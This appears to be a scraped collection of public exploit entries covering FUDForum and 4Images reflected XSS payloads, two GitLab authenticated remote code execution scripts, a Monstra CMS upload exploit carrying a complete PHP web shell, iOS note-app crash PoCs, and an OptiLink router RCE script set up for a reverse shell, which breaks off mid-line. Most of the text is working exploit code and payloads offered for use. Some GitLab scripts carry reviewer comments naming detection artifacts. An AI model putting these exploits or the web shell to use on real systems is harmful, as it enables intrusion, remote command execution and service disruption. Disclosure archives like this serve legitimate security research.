-
FUDForum 3.1.0 - 'srch' Reflected XSS
# Exploit Title: FUDForum 3.1.0 - 'srch' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: http://fudforum.org/ # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download # Version: FUDForum 3.1.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27519 -Description: A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter. -Payload used: x" onmouseover=alert(1) x=" -Steps to reproduce: 1- Go to https://localhost/fudforum/index.php?t=search& 2- In the "forum search" field, paste the XSS payload 3- Hover the mouse over "x" and the XSS is triggered
-
FUDForum 3.1.0 - 'author' Reflected XSS
# Exploit Title: FUDForum 3.1.0 - 'author' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: http://fudforum.org/ # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download # Version: FUDForum 3.1.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27520 -Description: A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter. -Payload used: y" onmouseover=alert(2) y=" -Steps to reproduce: 1- Go to https://localhost/fudforum/index.php?t=search& 2- In the "Filter by User" search field, paste the XSS payload 3- Hover the mouse over "y" and the XSS is triggered
-
Gitlab 13.9.3 - Remote Code Execution (Authenticated)
# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated)
# Date: 02/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.9.4
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.9.1 CE
# Credits: https://hackerone.com/reports/1125425
#!/usr/bin/python3
"""
Proof-of-concept for the GitLab wiki rendering issue referenced in the header
(fixed in 13.9.4 according to the "Version" line).

Flow, following the numbered print() markers below: sign in with the supplied
account, create a project with a random name, clone its wiki over git, push two
kramdown pages whose `{::options ... /}` block sets Rouge syntax_highlighter_opts,
then request the rendered second page.

Review notes (observations on the script as written, not changes):
- `verify=False` disables TLS certificate validation on the project-creation
  and trigger requests.
- All local work happens under the fixed path /tmp/project, which is later
  removed with `rm -rf`; git is driven through os.system() with interpolated,
  unquoted arguments.
- Artifacts a defender can look for on the GitLab side: a project named
  projectNNNN (N in 1..9999), a wiki commit with message "Commit69", and wiki
  pages load1/load2 whose first line starts with
  `{::options syntax_highlighter="rouge" syntax_highlighter_opts=`.
"""
import requests
from bs4 import BeautifulSoup
import random
import os
import argparse
parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()
username = args.u
password = args.p
gitlab_url = args.t
command = args.c
session = requests.Session()
# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
# CSRF token is read from the 17th <meta> tag by position; this breaks if the
# sign-in page layout differs from the one the author tested against.
token = soup.findAll('meta')[16].get("content")
login_form = {
    "authenticity_token": token,
    "user[login]": username,
    "user[password]": password,
    "user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
# Only the HTTP status is checked here; the response body is not inspected.
if r.status_code != 200:
    exit(f"Login Failed:{r.text}")
else:
    print("Successfully Authenticated")
# Creating Project
print("[2] Creating Project")
r = session.get(f"{gitlab_url}/projects/new")
soup = BeautifulSoup(r.text, features="lxml")
project_token = soup.findAll('meta')[16].get("content")
# The token is URL-encoded by hand because the request body below is sent as a
# preformatted string rather than a dict that requests would encode itself.
project_token = project_token.replace("==", "%3D%3D")
project_token = project_token.replace("+", "%2B")
# Random project name; the same value is used for the project path below.
project_name = f'project{random.randrange(1, 10000)}'
cookies = {'sidebar_collapsed': 'false','event_filter': 'all','hide_auto_devops_implicitly_enabled_banner_1': 'false','_gitlab_session': session.cookies['_gitlab_session'],}
# visibility_level=20 is presumably GitLab's "public" level — confirm against the
# target version's documentation.
payload=f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20"
# verify=False: TLS certificate validation is disabled for this request.
r = session.post(gitlab_url+'/projects', data=payload, cookies=cookies, verify=False)
if "The change you requested was rejected." in r.text:
    exit('Exploit failed, check input params')
else:
    print("Successfully created project")
# Cloning Wiki and Writing Files
print("[3] Pushing files to the project wiki")
wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git'
# Shell command assembled by string interpolation from CLI input; no quoting.
# Uses a fixed, predictable path under /tmp.
os.system(f"git clone {wiki_url} /tmp/project")
# Page 1: kramdown options block selecting the Rouge highlighter with a
# formatter/driver pair. The leading `{::options ...` line is the string a
# defender can search wiki history for.
f1 = open("/tmp/project/load1.rmd","w")
f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\}" /}\n\n')
f1.write('~~~ ruby\n')
f1.write(' def what?\n')
f1.write(' 42\n')
f1.write(' end\n')
f1.write('~~~\n')
f1.close()
# Page 2: same structure; the user-supplied command is embedded verbatim in the
# options string (no escaping), so a command containing quotes or braces will
# produce a malformed options block.
f2 = open("/tmp/project/load2.rmd","w")
temp='{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`'+command+'`\', formatter: GetProcessMem\}" /}\n\n'
f2.write(temp)
f2.write('~~~ ruby\n')
f2.write(' def what?\n')
f2.write(' 42\n')
f2.write(' end\n')
f2.write('~~~\n')
f2.close()
# It will prompt for user and pass. Enter it.
# Git credentials are entered interactively; the fixed commit message
# "Commit69" ends up in the wiki repository's history.
os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push')
print("Succesfully Pushed")
# Cleaning Up
# Removes only the local clone; the pushed wiki pages remain on the server.
os.system('rm -rf /tmp/project')
# Triggering RCE
print("[4] Triggering RCE")
trigger_url=f"{gitlab_url}/{username}/{project_name}/-/wikis/load2"
# The response is not inspected, so the script never confirms whether the page
# rendered or what happened server-side.
r = session.get(trigger_url, cookies=cookies, verify=False)
-
4Images 1.8 - 'redirect' Reflected XSS
# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6 # Version: 4Images Gallery 1.8 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27308 -Description: A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. -Steps to reproduce: 1- Go to the 4images admin panel page (demo instance: https://localhost/4images/admin/index.php) 2- Enter the credentials, turn on request interception and click "Login" 3- Paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE 4- Forward the request; the XSS is triggered.
-
Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) # Date: 03.06.2021 # Exploit Author: Ron Jost (hacker5preme) # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: Ubuntu 20.04 # CVE: CVE-2018-6383 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit ''' Description: Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048. ''' ''' Import required modules: ''' import argparse import requests ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') my_parser.add_argument('-T', type=str, help='Target IP') my_parser.add_argument('-P', type=str, help='Target Port') my_parser.add_argument("-U", type=str, help="Monstra CMS Path") my_parser.add_argument('-u', type=str, help="Username") my_parser.add_argument('-p', type=str, help='Password') args = my_parser.parse_args() target_ip = args.T target_port = args.P Monstracms_path = args.U username = args.u password = args.p ''' Exploit: ''' # Cookies: session = requests.Session() url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' cookies = session.get(url).cookies.get_dict() value = cookies['PHPSESSID'] cookies = { "__atuvc": "9%7C22", 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' } # Construct authentication header: headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://" + target_ip, "Connection": "close", 
"Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', "Upgrade-Insecure-Requests": "1"} # Construct authentication body body = { "login": username, "password": password, "login_submit": "Log In"} x = requests.post(url, headers=headers, cookies=cookies, data=body) # Construct Exploit link: url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' # Construct Exploit header: header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658", "Origin": "http://" + target_ip, "Connection": "close", "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', "Upgrade-Insecure-Requests": "1" } # Construct Exploit data: burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n 
\"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n 
border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span 
class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n 
_updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event 
|| window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\nUpload\r\n-----------------------------27822155982314896762160847658--\r\n" # Exploit: x = requests.post(url, headers=header, cookies=cookies, data=burp0_data) # Finish: print('') print('Please login in your webrowser and then open the following URL:') print('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar') print('')
-
Gitlab 13.10.2 - Remote Code Execution (Authenticated)
# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated)
# Date: 04/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.10.3
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.10.2 CE
# Credits: https://hackerone.com/reports/1154542
"""
Proof-of-concept for the GitLab image-upload issue referenced in the header
(fixed in 13.10.3 according to the "Version" line).

Flow, following the numbered print() markers below: sign in with the supplied
account, write a DjVu annotation text file whose Copyright string embeds the
command inside a Perl-style qx{} expression, wrap it into /tmp/exploit.jpg with
djvumake, and upload that file to /uploads/user declared as image/jpeg.

Review notes (observations on the script as written, not changes):
- The uploaded file is a DjVu container carrying a .jpg name and an
  image/jpeg content type; on the server side this shows up as a user upload
  whose declared type does not match its actual format.
- The success check is the server's "Failed to process image" error text — the
  author treats that response as the indicator that processing reached the
  crafted metadata (inferred from the check; confirm).
- Fixed paths /tmp/exploit and /tmp/exploit.jpg are used and never cleaned up;
  the file handle passed to requests is never closed; `verify=False` disables
  TLS certificate validation on the upload request.
"""
import requests
from bs4 import BeautifulSoup
import random
import os
import argparse
parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()
username = args.u
password = args.p
gitlab_url = args.t
command = args.c
session = requests.Session()
# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
# CSRF token is read from the 17th <meta> tag by position; brittle if the
# sign-in page layout differs from the one the author tested against.
token = soup.findAll('meta')[16].get("content")
login_form = {
    "authenticity_token": token,
    "user[login]": username,
    "user[password]": password,
    "user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
# Only the HTTP status is checked; the response body is not inspected.
if r.status_code != 200:
    exit(f"Login Failed:{r.text}")
else:
    print("Successfully Authenticated")
# payload creation
print("[2] Creating Payload ")
# The command is interpolated verbatim into a qx{...} expression; a command
# containing an unbalanced '}' would break the expression.
payload = f"\" . qx{{{command}}} . \\\n"
# Plain-text DjVu annotation chunk written to a fixed path; not removed later.
f1 = open("/tmp/exploit","w")
f1.write('(metadata\n')
f1.write(' (Copyright "\\\n')
f1.write(payload)
f1.write('" b ") )')
f1.close()
# Checking if djvumake is installed
check = os.popen('which djvumake').read()
if (check == ""):
    exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")
# Building the payload
# Produces a DjVu file (INFO/BGjp/ANTa chunks) that merely carries a .jpg name.
os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit')
# Uploading it
print("[3] Creating Snippet and Uploading")
# Getting the CSRF token
# Re-reads the token from the sign-in page while already authenticated.
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
csrf = soup.findAll('meta')[16].get("content")
cookies = {'_gitlab_session': session.cookies['_gitlab_session']}
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
    'Accept': 'application/json',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': f'{gitlab_url}/projects',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'X-Requested-With': 'XMLHttpRequest',
    'X-CSRF-Token': f'{csrf}'
}
# The file object opened here is never closed (no with-statement).
files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
# verify=False: TLS certificate validation is disabled for this request.
r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False)
# Inverted-looking check: the image-processing error text is what the author
# treats as success; any other response (including a normal successful upload)
# is reported as failure.
if r.text != "Failed to process image\n":
    exit("[-] Exploit failed")
else:
    print("[+] RCE Triggered !!")
-
Color Notes 1.4 - Denial of Service (PoC)
# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 # Version: 1.4 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a very long string of characters is entered while creating a note: # STEPS # # Open the program. # Create a new Note. # Run the Python script payload.py; it creates a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content of payload.txt twice into the new Note. # Crash. Successful exploitation causes the application to stop working. This was tested against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
-
Macaron Notes great notebook 5.5 - Denial of Service (PoC)
# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 # Version: 5.5 # Category: DoS (iOS) ##### Vulnerability ##### Macaron Notes great notebook is vulnerable to a DoS condition when a very long string of characters is entered while creating a note: # STEPS # # Open the program. # Create a new Note. # Run the Python script payload.py; it creates a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content of payload.txt twice into the new Note. # Crash. Successful exploitation causes the application to stop working. This was tested against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
-
OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated) # Date: 23/03/2021 # Exploit Authors: Developed by SecNigma and Amal. # Vendor Homepage: https://optilinknetwork.com/ # Version: ONT1GEW V2.1.11_X101 Build.1127.190306 # Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above, # as they do not release the firmware to the public for some unknown reason. # Additional notes: # Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306. # Device Name: ONT1GEW # Software Version: V2.1.11_X101 # Build Information: Build.1127.190306 # Chances are that XPONs of C-DATA company are affected too. # Our research indicated that Optilink devices are just a rebranded version of C-Data. # This exploit was tested on the following configuration. #!/usr/bin/python3 import requests import argparse import re def is_login_success(r): match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text) if match: return match # Default configuration # Router address = 192.168.101.1 # LPORT = 9001 # Default Username = e8c / Backdoor / # Default Password = e8c / Credentials / parser= argparse.ArgumentParser() parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP") parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True) parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!") parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router") parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router") args = parser.parse_args() target=args.target, lhost=args.lhost, lport=args.lport, user=args.user, 
